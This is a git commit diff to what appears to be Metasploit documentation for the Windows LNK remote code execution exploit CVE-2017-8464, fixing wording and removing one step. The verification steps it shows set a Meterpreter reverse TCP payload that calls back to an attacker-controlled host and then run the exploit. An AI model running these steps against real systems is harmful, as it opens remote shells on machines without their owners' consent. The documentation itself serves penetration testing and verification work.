Fix word choice in cve_2017_8464_lnk_rce

- Also remove an unnecessary example step
This commit is contained in:
Carter Brainerd (thecarterb)
2018-02-02 14:06:03 -05:00
committed by GitHub
parent 0739fab092
commit daedf2a089
@@ -7,7 +7,7 @@ A fix was released in the June 2017 Patch Tuesday.
## Vulnerable Setup
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed.
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are exploitable.
## Verification Steps
@@ -16,7 +16,6 @@ To set up the vulnerable environment, install a Windows version without the patc
2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
3. `set LHOST [ip victim connects back to]`
4. `exploit -j`
5. `back`
### Run the exploit